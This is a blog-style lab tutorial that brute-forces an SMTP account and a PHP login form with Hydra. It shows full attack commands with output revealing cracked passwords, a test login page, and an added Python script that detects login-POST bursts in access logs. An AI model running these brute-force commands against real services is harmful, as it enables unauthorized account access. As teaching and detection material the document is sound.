Tuesday, September 15, 2015

Brute-force login of web and mail with Hydra

** general information
smtp ip: 10.0.3.150
web ip: localhost
username list file: user.txt
password list file: pass.txt

1- installation
$ sudo apt-get install hydra

2- brute force email account of user1@test.qq

$ hydra -l user1@test.qq -P pass.txt 10.0.3.150 smtp
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-09-15 11:06:46
[DATA] 7 tasks, 1 server, 7 login tries (l:1/p:7), ~1 try per task
[DATA] attacking service smtp on port 25
[25][smtp] host: 10.0.3.150   login: user1@test.qq   password: pass1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-09-15 11:06:49


So the password of user1@test.qq is pass1.

3- brute force the web login form located at /login/index.php
***Simple web page with a login form to test against (save it in /login as index.php)***

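<?php

// Test login page with one hard-coded account; it is only the target for this demo.
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : "";
$show = true;   // true: display the login form
$msg = "";      // status message printed inside the form
if ($action == "")    /* handle the login form submission */
    {
        if ($_POST){
            $user = isset($_POST['user']) ? $_POST['user'] : "";
            $pass = isset($_POST['pass']) ? $_POST['pass'] : "";
            if ($user == "user1" && $pass == "pass1"){
                $msg = "login successful <br>";
                $show = false;
            }else{
                // hydra is told to treat this string as the failure marker
                $msg = "wrong password <br>";
            }
         }
    }

?>

<html>
<head>
<title>Login form</title>
</head>
<body>
    <?php
        if ($show == false){
            // logged in: only show the logout link
            echo '<a href="."> logout! </a>';
        }else{
            echo '<form method="post" action="index.php">';
            echo 'Username:<input type="text" size="12" maxlength="12" name="user"><br />';
            echo 'Password:<input type="password" size="12" maxlength="36" name="pass"><br />';
            echo $msg;
            echo '<input type="submit" name="login" value="Login">';
            echo '</form>';
        }
    ?>
</body>
</html>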


**************************************************************************

$ hydra localhost http-form-post "/login/index.php:user=^USER^&pass=^PASS^:wrong password" -L user.txt -P pass.txt
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-09-15 11:10:52
[DATA] 16 tasks, 1 server, 77 login tries (l:11/p:7), ~4 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1   login: user1   password: pass1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-09-15 11:10:52


So hydra found 1 correct username/password pair: user1 / pass1.
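On the server side, the run above shows up in the web access log as 77 POSTs to /login/index.php within about a second. The test form answers HTTP 200 for a wrong and a correct password alike, so the status code cannot separate failures from successes. The added example below (not part of the original post) therefore counts login POSTs per source IP in a sliding window; the combined log format, the thresholds and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/login/index.php"   # form location used on this page
WINDOW = timedelta(seconds=10)    # assumed thresholds, tune per site
MAX_POSTS = 10

# Apache/nginx "combined" format: ip - - [time] "METHOD path proto" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse(line):
    """Return (ip, timestamp, method, path without query) or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0]

def detect_bursts(lines, window=WINDOW, max_posts=MAX_POSTS):
    """Return {ip: peak login-POST count in any window} for IPs over the limit."""
    recent = defaultdict(deque)   # per-IP timestamps still inside the window
    peaks = {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue              # skip lines that are not in combined format
        ip, ts, method, path = rec
        if method != "POST" or path != LOGIN_PATH:
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) > max_posts:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks

def sample_log():
    """Constructed log: 77 POSTs in one second from one IP, plus a normal user."""
    fmt = ('{ip} - - [15/Sep/2015:11:10:{s:02d} +0000] '
           '"POST /login/index.php HTTP/1.0" 200 312 "-" "-"')
    burst = [fmt.format(ip="127.0.0.1", s=52) for _ in range(77)]
    human = [fmt.format(ip="192.0.2.10", s=s) for s in (5, 40)]
    return human + burst

if __name__ == "__main__":
    for ip, n in detect_bursts(sample_log()).items():
        print(f"{ip}: {n} login POSTs within {WINDOW.total_seconds():.0f}s")
```

The same counter can drive throttling or temporary lockout in front of the form; alerting alone only reports the burst after the guesses have been made.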


